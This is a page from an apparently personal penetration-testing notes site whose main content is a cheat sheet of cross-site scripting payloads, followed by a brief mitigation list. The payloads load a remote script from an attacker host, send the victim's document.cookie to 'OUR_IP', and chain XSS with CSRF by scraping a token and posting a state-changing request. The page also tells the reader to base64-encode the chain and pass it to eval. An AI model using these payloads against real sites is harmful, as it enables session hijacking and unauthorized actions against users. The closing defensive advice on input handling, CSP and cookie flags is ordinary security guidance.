📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • XSS
  • XSS + CSRF
  • Mitigation
  1. Hacking
  2. Exploitation

Cross Site Scripting

Snippets of XSS stuff

XSS

Basic XSS Payload

<script>alert(window.origin)</script>

Load remote script

<script src="http://OUR_IP/script.js"></script>

Send Cookie details to attacker server

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

XSS + CSRF

Chaining XSS + CSRF to execute javascript

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
function handleResponse(d) {
    var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/app/change-visibility', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    changeReq.send('csrf='+token+'&action=change');
};
</script>

Base64 encode the entire payload above and send with

eval(decode64('<base64 encoded payload>'));

Mitigation

  • Sanitize inputs on the Front-end and Back-end

  • Validate inputs on the Front-end and Back-end

  • Output HTML Encoding

    • html entities

  • Server Configuration

    • XSS prevention headers X-XSS-Protection

    • Use Content-Security-Policy options like script-src="self" to only allow locally hosted scripts

    • Use HttpOnly and Secure cookie flags to prevent JavaScript from reading cookie values

  • WAF to detect and block XSS attacks

  • Same Origin Policy for Cross-Site. Does not work for the same site

PreviousSQL InjectionNextCommand Injection

Last updated 2 years ago